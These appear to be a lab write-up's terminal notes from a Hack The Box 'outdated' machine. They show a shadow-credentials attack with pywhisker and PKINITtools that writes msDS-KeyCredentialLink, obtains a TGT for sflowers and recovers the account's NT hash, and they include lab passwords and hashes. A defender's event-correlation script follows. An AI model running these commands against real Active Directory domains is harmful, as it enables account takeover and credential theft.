pywhisker / gettgtpkinit.py / getnthash.py
pywhisker installed with: pipx install pywhisker
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pipx list
venvs are in /home/bolke/.local/share/pipx/venvs
apps are exposed on your $PATH at /home/bolke/.local/bin
manual pages are exposed at /home/bolke/.local/share/man
package certipy-ad 5.0.2, installed using Python 3.13.2
- certipy
package donpapi 2.1.0, installed using Python 3.13.2
- DonPAPI
- donpapi
- dpp
package impacket 0.13.0.dev0+20250415.195618.c384b5fb, installed using Python 3.13.2
- DumpNTLMInfo.py
--snip--
package pywhisker 0.1.2, installed using Python 3.13.2
- pywhisker
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker --action list -d outdated.htb -u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175 -t sflowers --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker --action add -d outdated.htb -u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175 -t sflowers --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 4f2cd3e5-b6c1-3a74-b0b6-b852cd703b5c
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: tFxD90ok.pfx
[*] Must be used with password: pSDHrW2Yha3Gy80yHFXj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ git clone https://github.com/dirkjanm/PKINITtools.git
Cloning into 'PKINITtools'...
remote: Enumerating objects: 45, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 45 (delta 14), reused 10 (delta 10), pack-reused 27 (from 1)
Receiving objects: 100% (45/45), 28.08 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (21/21), done.
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ cd PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-09 16:27:33,183 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
zsh: segmentation fault python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass sflowers.ccache
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ virtualenv venv
created virtual environment CPython3.13.2.final.0-64 in 193ms
creator CPython3Posix(dest=/home/bolke/htb/outdated/PKINITtools/venv, clear=False, no_vcs_ignore=False, global=False)
seeder FromAppData(download=False, pip=bundle, via=copy, app_data_dir=/home/bolke/.local/share/virtualenv)
added seed packages: pip==25.0.1
activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ source venv/bin/activate
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install minikerberos
Collecting minikerberos
Using cached minikerberos-0.4.6-py3-none-any.whl.metadata (734 bytes)
Collecting asn1crypto>=1.5.1 (from minikerberos)
Using cached asn1crypto-1.5.1-py2.py3-none-any.whl.metadata (13 kB)
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: asn1crypto, tqdm, six, pycryptodomex, pycparser, oscrypto, h11, unicrypto, cffi, cryptography, asysocks, minikerberos
Successfully installed asn1crypto-1.5.1 asysocks-0.2.13 cffi-1.17.1 cryptography-45.0.3 h11-0.16.0 minikerberos-0.4.6 oscrypto-1.3.0 pycparser-2.22 pycryptodomex-3.23.0 six-1.17.0 tqdm-4.67.1 unicrypto-0.0.10
If a clock skew error appears (minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"), sync the local clock with the DC:
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ sudo ntpdate outdated.htb
2025-06-10 00:30:55.216907 (+0200) +28799.608686 +/- 0.015638 outdated.htb 10.10.11.175 s1 no-leap
CLOCK: time stepped by 28799.608686
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-10 00:31:09,795 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-10 00:31:09,815 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-10 00:31:19,261 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-10 00:31:19,261 minikerberos INFO 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
INFO:minikerberos:43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
2025-06-10 00:31:19,271 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip list
Package Version
------------- -------
asn1crypto 1.5.1
asysocks 0.2.13
cffi 1.17.1
cryptography 45.0.3
h11 0.16.0
minikerberos 0.4.6
oscrypto 1.3.0
pip 25.0.1
pycparser 2.22
pycryptodomex 3.23.0
six 1.17.0
tqdm 4.67.1
unicrypto 0.0.10
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ export KRB5CCNAME=sflowers.ccache
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ klist
Ticket cache: FILE:sflowers.ccache
Default principal: sflowers@OUTDATED.HTB
Valid starting Expires Service principal
06/10/2025 00:31:19 06/10/2025 10:31:19 krbtgt/OUTDATED.HTB@OUTDATED.HTB
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
Traceback (most recent call last):
  File "/home/bolke/htb/outdated/PKINITtools/getnthash.py", line 33, in <module>
    from pyasn1.type.univ import noValue, SequenceOf, Integer
ModuleNotFoundError: No module named 'pyasn1'
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install -r requirements.txt
Collecting impacket (from -r requirements.txt (line 1))
Using cached impacket-0.12.0-py3-none-any.whl
Requirement already satisfied: minikerberos in ./venv/lib/python3.13/site-packages (from -r requirements.txt (line 2)) (0.4.6)
Collecting pyasn1>=0.2.3 (from impacket->-r requirements.txt (line 1))
Using cached pyasn1-0.6.1-py3-none-any.whl.metadata (8.4 kB)
Collecting pyasn1_modules (from impacket->-r requirements.txt (line 1))
Using cached pyasn1_modules-0.4.2-py3-none-any.whl.metadata (3.5 kB)
Requirement already satisfied: pycryptodomex in ./venv/lib/python3.13/site-packages (from impacket->-r requirements.txt (line 1)) (3.23.0)
--snip--
Using cached MarkupSafe-3.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (23 kB)
Using cached werkzeug-3.1.3-py3-none-any.whl (224 kB)
Using cached dnspython-2.7.0-py3-none-any.whl (313 kB)
Installing collected packages: setuptools, pyasn1, markupsafe, itsdangerous, dnspython, click, charset_normalizer, blinker, werkzeug, pyasn1_modules, ldap3, jinja2, cryptography, pyOpenSSL, ldapdomaindump, flask, impacket
Attempting uninstall: cryptography
Found existing installation: cryptography 45.0.3
Uninstalling cryptography-45.0.3:
Successfully uninstalled cryptography-45.0.3
Successfully installed blinker-1.9.0 charset_normalizer-3.4.2 click-8.2.1 cryptography-42.0.8 dnspython-2.7.0 flask-3.1.1 impacket-0.12.0 itsdangerous-2.2.0 jinja2-3.1.6 ldap3-2.9.1 ldapdomaindump-0.10.0 markupsafe-3.0.2 pyOpenSSL-24.0.0 pyasn1-0.6.1 pyasn1_modules-0.4.2 setuptools-80.9.0 werkzeug-3.1.3
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
/home/bolke/htb/outdated/PKINITtools/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5
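Defender's view of the steps above, as an added example that is not part of the original notes or of pywhisker/PKINITtools: the msDS-KeyCredentialLink write surfaces as Security event 5136 and the certificate-based TGT request as event 4768 with PreAuthType 16, so the two can be correlated. The event records, their timestamps, the source IP and the DN-to-account map are constructed for illustration, and the field set is simplified.

```python
from datetime import datetime, timedelta

# Constructed sample events (simplified fields of Security events 5136 and 4768).
EVENTS = [
    {"id": 5136, "time": "2025-06-10T00:29:41", "SubjectUserName": "btables",
     "ObjectDN": "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"id": 4768, "time": "2025-06-10T00:31:19", "TargetUserName": "sflowers",
     "PreAuthType": "16", "IpAddress": "::ffff:10.10.14.7"},
    {"id": 4768, "time": "2025-06-10T00:40:02", "TargetUserName": "btables",
     "PreAuthType": "2", "IpAddress": "::ffff:10.10.14.7"},
]
# Assumption: DN -> sAMAccountName mapping obtained from a directory lookup.
DN_TO_SAM = {"CN=Susan Flowers,CN=Users,DC=outdated,DC=htb": "sflowers"}

VALUE_ADDED = "%%14674"  # 5136 OperationType: value added
PKINIT = "16"            # 4768 PreAuthType: PA-PK-AS-REQ (certificate logon)

def key_credential_writes(events, allowed_writers=frozenset()):
    """5136 events where a non-allowlisted subject adds a msDS-KeyCredentialLink value."""
    return [e for e in events
            if e["id"] == 5136
            and e["AttributeLDAPDisplayName"].lower() == "msds-keycredentiallink"
            and e["OperationType"] == VALUE_ADDED
            and e["SubjectUserName"].lower() not in allowed_writers]

def correlate(events, dn_to_sam, window=timedelta(hours=1), allowed_writers=frozenset()):
    """Pair each suspicious write with PKINIT TGT requests for the same account in the window."""
    alerts = []
    for w in key_credential_writes(events, allowed_writers):
        target = dn_to_sam.get(w["ObjectDN"])
        t0 = datetime.fromisoformat(w["time"])
        followups = [e for e in events
                     if e["id"] == 4768 and e["PreAuthType"] == PKINIT
                     and e["TargetUserName"].lower() == (target or "").lower()
                     and t0 <= datetime.fromisoformat(e["time"]) <= t0 + window]
        alerts.append({"writer": w["SubjectUserName"],
                       "target": target or w["ObjectDN"],
                       "pkinit_from": [e["IpAddress"] for e in followups]})
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS, DN_TO_SAM):
        print(alert)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object carries a SACL that covers the attribute write.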
References used